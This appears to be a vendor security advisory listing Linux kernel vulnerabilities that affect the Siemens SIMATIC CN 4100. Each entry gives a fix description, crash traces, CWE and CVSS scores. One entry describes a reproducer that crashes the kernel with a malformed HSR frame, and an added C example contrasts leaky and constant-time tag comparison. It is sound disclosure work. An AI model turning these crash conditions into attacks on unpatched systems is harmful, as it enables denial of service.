Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39689

In the Linux kernel, the following vulnerability has been resolved:

ftrace: Also allocate and copy hash for reading of filter files

Currently the reader of set_ftrace_filter and set_ftrace_notrace just adds the pointer to the global tracer hash to its iterator. Unlike the writer that allocates a copy of the hash, the reader keeps the pointer to the filter hashes. This is problematic because this pointer is static across function calls that release the locks that can update the global tracer hashes. This can cause UAF and similar bugs.

Allocate and copy the hash for reading the filter files like it is done for the writers. This not only fixes UAF bugs, but also makes the code a bit simpler as it doesn't have to differentiate when to free the iterator's hash between writers and readers.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39691

In the Linux kernel, the following vulnerability has been resolved:

fs/buffer: fix use-after-free when call bh_read() helper

There's an issue as follows:

BUG: KASAN: stack-out-of-bounds in end_buffer_read_sync+0xe3/0x110
Read of size 8 at addr ffffc9000168f7f8 by task swapper/3/0
CPU: 3 UID: 0 PID: 0 Comm: swapper/3 Not tainted 6.16.0-862.14.0.6.x86_64
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
Call Trace:
 dump_stack_lvl+0x55/0x70
 print_address_description.constprop.0+0x2c/0x390
 print_report+0xb4/0x270
 kasan_report+0xb8/0xf0
 end_buffer_read_sync+0xe3/0x110
 end_bio_bh_io_sync+0x56/0x80
 blk_update_request+0x30a/0x720
 scsi_end_request+0x51/0x2b0
 scsi_io_completion+0xe3/0x480
 ? scsi_device_unbusy+0x11e/0x160
 blk_complete_reqs+0x7b/0x90
 handle_softirqs+0xef/0x370
 irq_exit_rcu+0xa5/0xd0
 sysvec_apic_timer_interrupt+0x6e/0x90

The above issue happens when doing an ntfs3 filesystem mount; the issue may happen as follows:

           mount                            IRQ
ntfs_fill_super
  read_cache_page
    do_read_cache_folio
      filemap_read_folio
        mpage_read_folio
          do_mpage_readpage
            ntfs_get_block_vbo
              bh_read
                submit_bh
                wait_on_buffer(bh);
                                    blk_complete_reqs
                                     scsi_io_completion
                                      scsi_end_request
                                       blk_update_request
                                        end_bio_bh_io_sync
                                         end_buffer_read_sync
                                          __end_buffer_read_notouch
                                           unlock_buffer

                wait_on_buffer(bh);--> return will return to caller

                                          put_bh
                                            --> trigger stack-out-of-bounds

In the mpage_read_folio() function, the stack variable 'map_bh' is passed to ntfs_get_block_vbo(). Once unlock_buffer() unlocks and wait_on_buffer() returns to continue processing, the stack variable is likely to be reclaimed.
Consequently, during the end_buffer_read_sync() process, calling put_bh() may result in stack overrun.

If the bh is not allocated on the stack, it belongs to a folio. Freeing a buffer head which belongs to a folio is done by drop_buffers() which will fail to free buffers which are still locked. So it is safe to call put_bh() before __end_buffer_read_notouch().

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 4.4; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39692

In the Linux kernel, the following vulnerability has been resolved:

smb: server: split ksmbd_rdma_stop_listening() out of ksmbd_rdma_destroy()

We can't call destroy_workqueue(smb_direct_wq); before stop_sessions()!

Otherwise already existing connections try to use smb_direct_wq as a NULL pointer.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39693

In the Linux kernel, the following vulnerability has been resolved:

drm/amd/display: Avoid a NULL pointer dereference

[WHY]
Although unlikely drm_atomic_get_new_connector_state() or drm_atomic_get_old_connector_state() can return NULL.

[HOW]
Check returns before dereference.

(cherry picked from commit 1e5e8d672fec9f2ab352be121be971877bff2af9)

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS Version 3.1; Base Score 4.7; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39694

In the Linux kernel, the following vulnerability has been resolved:

s390/sclp: Fix SCCB present check

Tracing code called by the SCLP interrupt handler contains early exits if the SCCB address associated with an interrupt is NULL. This check is performed after physical to virtual address translation.

If the kernel identity mapping does not start at address zero, the resulting virtual address is never zero, so that the NULL checks won't work. Subsequently this may result in incorrect accesses to the first page of the identity mapping.

Fix this by introducing a function that handles the NULL case before address translation.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-39697

In the Linux kernel, the following vulnerability has been resolved:

NFS: Fix a race when updating an existing write

After nfs_lock_and_join_requests() tests for whether the request is still attached to the mapping, nothing prevents a call to nfs_inode_remove_request() from succeeding until we actually lock the page group.
The reason is that whoever called nfs_inode_remove_request() doesn't necessarily have a lock on the page group head.

So in order to avoid races, let's take the page group lock earlier in nfs_lock_and_join_requests(), and hold it across the removal of the request in nfs_inode_remove_request().

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Metrics: CVSS Version 3.1; Base Score 4.7; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39701

In the Linux kernel, the following vulnerability has been resolved:

ACPI: pfr_update: Fix the driver update version check

The security-version-number check should be used rather than the runtime version check for driver updates.

Otherwise, the firmware update would fail when the update binary had a lower runtime version number than the current one.

[ rjw: Changelog edits ]

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-1025 Comparison Using Wrong Factors
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39702

In the Linux kernel, the following vulnerability has been resolved:

ipv6: sr: Fix MAC comparison to be constant-time

To prevent timing attacks, MACs need to be compared in constant time. Use the appropriate helper function for this.
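
An added illustration of the point made for CVE-2025-39702 (not code from the kernel or from this advisory): an early-exit comparison reads a number of bytes that depends on where two tags first differ, while a constant-time comparison reads every byte and reports only equal or different. The tag length, sample bytes and function names are assumptions made for the example; inside the kernel the existing helper crypto_memneq() serves this purpose.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TAG_LEN 32 /* constructed tag length, chosen for this example */

/* Early-exit comparison, the behaviour of a memcmp()-style check.
 * Returns 1 if the tags differ. *examined is the number of bytes read
 * before returning, which is the quantity that response time tracks. */
int leaky_tag_differs(const uint8_t *a, const uint8_t *b, size_t n,
                      size_t *examined)
{
    for (size_t i = 0; i < n; i++) {
        if (a[i] != b[i]) {
            *examined = i + 1;
            return 1;
        }
    }
    *examined = n;
    return 0;
}

/* Constant-time comparison: every byte pair is XORed into an accumulator
 * and there is no branch on tag contents. Returns 1 if the tags differ,
 * 0 if equal (same convention as crypto_memneq()). */
int ct_tag_differs(const uint8_t *a, const uint8_t *b, size_t n)
{
    volatile uint8_t acc = 0;

    for (size_t i = 0; i < n; i++)
        acc |= (uint8_t)(a[i] ^ b[i]);
    /* acc is 0..255: adding 0xFF carries into bit 8 exactly when acc != 0. */
    return (int)(((unsigned int)acc + 0xFFu) >> 8);
}

/* Constructed sample data: an expected tag and a received tag that first
 * differs at byte `pos`. pos >= TAG_LEN leaves the two tags identical. */
void make_tags(uint8_t *expected, uint8_t *received, size_t pos)
{
    for (size_t i = 0; i < TAG_LEN; i++)
        expected[i] = (uint8_t)(0xA0 + i);
    memcpy(received, expected, TAG_LEN);
    if (pos < TAG_LEN)
        received[pos] ^= 0x01;
}

/* Bytes the early-exit check reads for a mismatch at `pos`. */
size_t leaky_bytes_examined(size_t pos)
{
    uint8_t expected[TAG_LEN], received[TAG_LEN];
    size_t examined = 0;

    make_tags(expected, received, pos);
    leaky_tag_differs(expected, received, TAG_LEN, &examined);
    return examined;
}

/* Verdict of the constant-time check for a mismatch at `pos`. */
int ct_verdict(size_t pos)
{
    uint8_t expected[TAG_LEN], received[TAG_LEN];

    make_tags(expected, received, pos);
    return ct_tag_differs(expected, received, TAG_LEN);
}

int main(void)
{
    const size_t positions[] = {0, 15, 31};

    for (size_t k = 0; k < sizeof(positions) / sizeof(positions[0]); k++) {
        size_t pos = positions[k];

        printf("mismatch at byte %2zu: early-exit read %2zu bytes, "
               "constant-time read %d bytes (differs=%d)\n",
               pos, leaky_bytes_examined(pos), TAG_LEN, ct_verdict(pos));
    }
    printf("identical tags: early-exit read %zu bytes, differs=%d\n",
           leaky_bytes_examined(TAG_LEN), ct_verdict(TAG_LEN));
    return 0;
}
```

The early-exit column changes with the mismatch position while the constant-time column does not, which is the property the fix relies on.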

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-208 Observable Timing Discrepancy
Metrics: CVSS Version 3.1; Base Score 7.1; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2025-39703

In the Linux kernel, the following vulnerability has been resolved:

net, hsr: reject HSR frame if skb can't hold tag

Receiving HSR frame with insufficient space to hold HSR tag in the skb can result in a crash (kernel BUG):

[ 45.390915] skbuff: skb_under_panic: text:ffffffff86f32cac len:26 put:14 head:ffff888042418000 data:ffff888042417ff4 tail:0xe end:0x180 dev:bridge_slave_1
[ 45.392559] ------------[ cut here ]------------
[ 45.392912] kernel BUG at net/core/skbuff.c:211!
[ 45.393276] Oops: invalid opcode: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI
[ 45.393809] CPU: 1 UID: 0 PID: 2496 Comm: reproducer Not tainted 6.15.0 #12 PREEMPT(undef)
[ 45.394433] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014
[ 45.395273] RIP: 0010:skb_panic+0x15b/0x1d0
[ 45.402911] Call Trace:
[ 45.403105]
[ 45.404470] skb_push+0xcd/0xf0
[ 45.404726] br_dev_queue_push_xmit+0x7c/0x6c0
[ 45.406513] br_forward_finish+0x128/0x260
[ 45.408483] __br_forward+0x42d/0x590
[ 45.409464] maybe_deliver+0x2eb/0x420
[ 45.409763] br_flood+0x174/0x4a0
[ 45.410030] br_handle_frame_finish+0xc7c/0x1bc0
[ 45.411618] br_handle_frame+0xac3/0x1230
[ 45.413674] __netif_receive_skb_core.constprop.0+0x808/0x3df0
[ 45.422966] __netif_receive_skb_one_core+0xb4/0x1f0
[ 45.424478] __netif_receive_skb+0x22/0x170
[ 45.424806] process_backlog+0x242/0x6d0
[ 45.425116] __napi_poll+0xbb/0x630
[ 45.425394] net_rx_action+0x4d1/0xcc0
[ 45.427613] handle_softirqs+0x1a4/0x580
[ 45.427926] do_softirq+0x74/0x90
[ 45.428196]

This issue was found by syzkaller.

The panic happens in br_dev_queue_push_xmit() once it receives a corrupted skb with ETH header already pushed in linear data. When it attempts the skb_push() call, there's not enough headroom and skb_push() panics.

The corrupted skb is put on the queue by HSR layer, which makes a sequence of unintended transformations when it receives a specific corrupted HSR frame (with incomplete TAG).

Fix it by dropping and consuming frames that are not long enough to contain both ethernet and hsr headers.

Alternative fix would be to check for enough headroom before skb_push() in br_dev_queue_push_xmit().

In the reproducer, this is injected via AF_PACKET, but I don't easily see why it couldn't be sent over the wire from adjacent network.

Further Details:

In the reproducer, the following network interface chain is set up:

 ┌────────────────┐   ┌────────────────┐
 │ veth0_to_hsr   ├───┤  hsr_slave0    ┼───┐
 └────────────────┘   └────────────────┘   │
                                           │ ┌──────┐
                                           ├─┤ hsr0 ├───┐
                                           │ └──────┘   │
 ┌────────────────┐   ┌────────────────┐   │            │┌────────┐
 │ veth1_to_hsr   ┼───┤  hsr_slave1    ├───┘            └┤        │
 └────────────────┘   └────────────────┘                ┌┼ bridge │
                                                        ││        │
                                                        │└────────┘
                                                        │
                                         ┌───────┐      │
                                         │  ...  ├──────┘
                                         └───────┘

To trigger the events leading up to crash, reproducer sends a corrupted HSR fr ---truncated---

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-1286 Improper Validation of Syntactic Correctness of Input
Metrics: CVSS Version 3.1; Base Score 6.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39706

In the Linux kernel, the following vulnerability has been resolved:

drm/amdkfd: Destroy KFD debugfs after destroy KFD wq

Since KFD proc content was moved to kernel debugfs, we can't destroy KFD debugfs before kfd_process_destroy_wq.
Move kfd_process_destroy_wq prior to kfd_debugfs_fini to fix a kernel NULL pointer problem. It happens when /sys/kernel/debug/kfd was already destroyed in kfd_debugfs_fini but kfd_process_destroy_wq calls kfd_debugfs_remove_process. This line

debugfs_remove_recursive(entry->proc_dentry);

tries to remove /sys/kernel/debug/kfd/proc/ while /sys/kernel/debug/kfd is already gone. It hangs the kernel by kernel NULL pointer.

(cherry picked from commit 0333052d90683d88531558dcfdbf2525cc37c233)

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39709

In the Linux kernel, the following vulnerability has been resolved:

media: venus: protect against spurious interrupts during probe

Make sure the interrupt handler is initialized before the interrupt is registered.

If the IRQ is registered before hfi_create(), it's possible that an interrupt fires before the handler setup is complete, leading to a NULL dereference.

This error condition has been observed during system boot on Rb3Gen2.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39710

In the Linux kernel, the following vulnerability has been resolved:

media: venus: Add a check for packet size after reading from shared memory

Add a check to ensure that the packet size does not exceed the number of available words after reading the packet header from shared memory. This ensures that the size provided by the firmware is safe to process and prevents potential out-of-bounds memory access.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39713

In the Linux kernel, the following vulnerability has been resolved:

media: rainshadow-cec: fix TOCTOU race condition in rain_interrupt()

In the interrupt handler rain_interrupt(), the buffer full check on rain->buf_len is performed before acquiring rain->buf_lock. This creates a Time-of-Check to Time-of-Use (TOCTOU) race condition, as rain->buf_len is concurrently accessed and modified in the work handler rain_irq_work_handler() under the same lock.

Multiple interrupt invocations can race, with each reading buf_len before it becomes full and then proceeding. This can lead to both interrupts attempting to write to the buffer, incrementing buf_len beyond its capacity (DATA_SIZE) and causing a buffer overflow.

Fix this bug by moving the spin_lock() to before the buffer full check. This ensures that the check and the subsequent buffer modification are performed atomically, preventing the race condition. A corresponding spin_unlock() is added to the overflow path to correctly release the lock.

This possible bug was found by an experimental static analysis tool developed by our team.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39714

In the Linux kernel, the following vulnerability has been resolved:

media: usbtv: Lock resolution while streaming

When a program is streaming (ffplay) and another program (qv4l2) changes the TV standard from NTSC to PAL, the kernel crashes due to trying to copy to unmapped memory.

Changing from NTSC to PAL increases the resolution in the usbtv struct, but the video plane buffer isn't adjusted, so it overflows.

[hverkuil: call vb2_is_busy instead of vb2_is_streaming]

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39715

In the Linux kernel, the following vulnerability has been resolved:

parisc: Revise gateway LWS calls to probe user read access

We use load and stbys,e instructions to trigger memory reference interruptions without writing to memory.
Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel and gateway page execute at privilege level 0, so this code never triggers a read access interruption. Thus, it is currently possible for user code to execute a LWS compare and swap operation at an address that is read protected at privilege level 3 (PRIV_USER).

Fix this by probing read access rights at privilege level 3 and branching to lws_fault if access isn't allowed.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39716

In the Linux kernel, the following vulnerability has been resolved:

parisc: Revise __get_user() to probe user read access

Because of the way read access support is implemented, read access interruptions are only triggered at privilege levels 2 and 3. The kernel executes at privilege level 0, so __get_user() never triggers a read access interruption (code 26). Thus, it is currently possible for user code to access a read protected address via a system call.

Fix this by probing read access rights at privilege level 3 (PRIV_USER) and setting __gu_err to -EFAULT (-14) if access isn't allowed.

Note the cmpiclr instruction does a 32-bit compare because COND macro doesn't work inside asm.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39718

In the Linux kernel, the following vulnerability has been resolved:

vsock/virtio: Validate length in packet header before skb_put()

When receiving a vsock packet in the guest, only the virtqueue buffer size is validated prior to virtio_vsock_skb_rx_put(). Unfortunately, virtio_vsock_skb_rx_put() uses the length from the packet header as the length argument to skb_put(), potentially resulting in SKB overflow if the host has gone wonky.

Validate the length as advertised by the packet header before calling virtio_vsock_skb_rx_put().

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS Version 3.1, Base Score 7.6, Base Severity HIGH, Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVE-2025-39719

In the Linux kernel, the following vulnerability has been resolved:

iio: imu: bno055: fix OOB access of hw_xlate array

Fix a potential out-of-bounds array access of the hw_xlate array in bno055.c.

In bno055_get_regmask(), hw_xlate was iterated over the length of the vals array instead of the length of the hw_xlate array. In the case of bno055_gyr_scale, the vals array is larger than the hw_xlate array, so this could result in an out-of-bounds access.
In practice, this shouldn't happen though because a match should always be found which breaks out of the for loop before it iterates beyond the end of the hw_xlate array.

By adding a new hw_xlate_len field to the bno055_sysfs_attr, we can be sure we are iterating over the correct length.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39724

In the Linux kernel, the following vulnerability has been resolved:

serial: 8250: fix panic due to PSLVERR

When the PSLVERR_RESP_EN parameter is set to 1, the device generates an error response if an attempt is made to read an empty RBR (Receive Buffer Register) while the FIFO is enabled.

In serial8250_do_startup(), calling serial_port_out(port, UART_LCR, UART_LCR_WLEN8) triggers dw8250_check_lcr(), which invokes dw8250_force_idle() and serial8250_clear_and_reinit_fifos(). The latter function enables the FIFO via serial_out(p, UART_FCR, p->fcr). Execution proceeds to the serial_port_in(port, UART_RX). This satisfies the PSLVERR trigger condition.

When another CPU (e.g., using printk()) is accessing the UART (UART is busy), the current CPU fails the check (value & ~UART_LCR_SPAR) == (lcr & ~UART_LCR_SPAR) in dw8250_check_lcr(), causing it to enter dw8250_force_idle().

Put serial_port_out(port, UART_LCR, UART_LCR_WLEN8) under the port->lock to fix this issue.

Panic backtrace:
    [ 0.442336] Oops - unknown exception [#1]
    [ 0.442343] epc : dw8250_serial_in32+0x1e/0x4a
    [ 0.442351] ra : serial8250_do_startup+0x2c8/0x88e
    ...
    [ 0.442416] console_on_rootfs+0x26/0x70

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39736

In the Linux kernel, the following vulnerability has been resolved:

mm/kmemleak: avoid deadlock by moving pr_warn() outside kmemleak_lock

When netpoll is enabled, calling pr_warn_once() while holding kmemleak_lock in mem_pool_alloc() can cause a deadlock due to lock inversion with the netconsole subsystem. This occurs because pr_warn_once() may trigger netpoll, which eventually leads to __alloc_skb() and back into kmemleak code, attempting to reacquire kmemleak_lock.

This is the path for the deadlock.

    mem_pool_alloc()
      -> raw_spin_lock_irqsave(&kmemleak_lock, flags);
        -> pr_warn_once()
          -> netconsole subsystem
            -> netpoll
              -> __alloc_skb
                -> __create_object
                  -> raw_spin_lock_irqsave(&kmemleak_lock, flags);

Fix this by setting a flag and issuing the pr_warn_once() after kmemleak_lock is released.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-833 Deadlock
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39737

In the Linux kernel, the following vulnerability has been resolved:

mm/kmemleak: avoid soft lockup in __kmemleak_do_cleanup()

A soft lockup warning was observed on a relatively small x86-64 system with 16 GB of memory when running a debug kernel with kmemleak enabled.

    watchdog: BUG: soft lockup - CPU#8 stuck for 33s! [kworker/8:1:134]

The test system was running a workload with hot unplug happening in parallel. Then kmemleak decided to disable itself due to its inability to allocate more kmemleak objects. The debug kernel has its CONFIG_DEBUG_KMEMLEAK_MEM_POOL_SIZE set to 40,000.

The soft lockup happened in kmemleak_do_cleanup() when the existing kmemleak objects were being removed and deleted one-by-one in a loop via a workqueue. In this particular case, there are at least 40,000 objects that need to be processed and given the slowness of a debug kernel and the fact that a raw_spinlock has to be acquired and released in __delete_object(), it could take a while to properly handle all these objects.

As kmemleak has been disabled in this case, the object removal and deletion process can be further optimized as locking isn't really needed. However, it is probably not worth the effort to optimize for such an edge case that should rarely happen. So the simple solution is to call cond_resched() at periodic interval in the iteration loop to avoid soft lockup.
Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1, Base Score 5.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39738

In the Linux kernel, the following vulnerability has been resolved:

btrfs: do not allow relocation of partially dropped subvolumes

[BUG]
There is an internal report that balance triggered transaction abort, with the following call trace:

    item 85 key (594509824 169 0) itemoff 12599 itemsize 33
      extent refs 1 gen 197740 flags 2
      ref#0: tree block backref root 7
    item 86 key (594558976 169 0) itemoff 12566 itemsize 33
      extent refs 1 gen 197522 flags 2
      ref#0: tree block backref root 7
    ...
    BTRFS error (device loop0): extent item not found for insert, bytenr 594526208 num_bytes 16384 parent 449921024 root_objectid 934 owner 1 offset 0
    BTRFS error (device loop0): failed to run delayed ref for logical 594526208 num_bytes 16384 type 182 action 1 ref_mod 1: -117
    ------------[ cut here ]------------
    BTRFS: Transaction aborted (error -117)
    WARNING: CPU: 1 PID: 6963 at ../fs/btrfs/extent-tree.c:2168 btrfs_run_delayed_refs+0xfa/0x110 [btrfs]

And btrfs check doesn't report anything wrong related to the extent tree.

[CAUSE]
The cause is a little complex, firstly the extent tree indeed doesn't have the backref for 594526208.
The extent tree only has the following two backrefs around that bytenr on-disk:

    item 65 key (594509824 METADATA_ITEM 0) itemoff 13880 itemsize 33
      refs 1 gen 197740 flags TREE_BLOCK
      tree block skinny level 0
      (176 0x7) tree block backref root CSUM_TREE
    item 66 key (594558976 METADATA_ITEM 0) itemoff 13847 itemsize 33
      refs 1 gen 197522 flags TREE_BLOCK
      tree block skinny level 0
      (176 0x7) tree block backref root CSUM_TREE

But such a missing backref item is not a corruption on disk, as the offending delayed ref belongs to subvolume 934, and that subvolume is being dropped:

    item 0 key (934 ROOT_ITEM 198229) itemoff 15844 itemsize 439
      generation 198229 root_dirid 256 bytenr 10741039104 byte_limit 0 bytes_used 345571328
      last_snapshot 198229 flags 0x1000000000001(RDONLY) refs 0
      drop_progress key (206324 EXTENT_DATA 2711650304) drop_level 2
      level 2 generation_v2 198229

And that offending tree block 594526208 is inside the dropped range of that subvolume. That explains why there is no backref item for that bytenr and why btrfs check is not reporting anything wrong.

But this also shows another problem, as btrfs will do all the orphan subvolume cleanup at a read-write mount.

So half-dropped subvolume should not exist after an RW mount, and balance itself is also exclusive to subvolume cleanup, meaning we shouldn't hit a subvolume half-dropped during relocation.

The root cause is, there is no orphan item for this subvolume. In fact there are 5 subvolumes from around 2021 that have the same problem.

It looks like the original report has some older kernels running, and caused those zombie subvolumes.

Thankfully upstream commit 8d488a8c7ba2 ("btrfs: fix subvolume/snapshot deletion not triggered on mount") has long fixed the bug.

[ENHANCEMENT]
For repairing such old fs, btrfs-progs will be enhanced.

Considering how delayed the problem will show up (at run delayed ref time) and at that time we have to abort transaction already, it is too late.
Instead here we reject any half-dropped subvolume for reloc tree at the earliest time, preventing confusion and extra time wasted on debugging similar bugs.

Affected Products: Siemens SIMATIC
Vendor: Siemens
Product Version: SIMATIC CN 4100
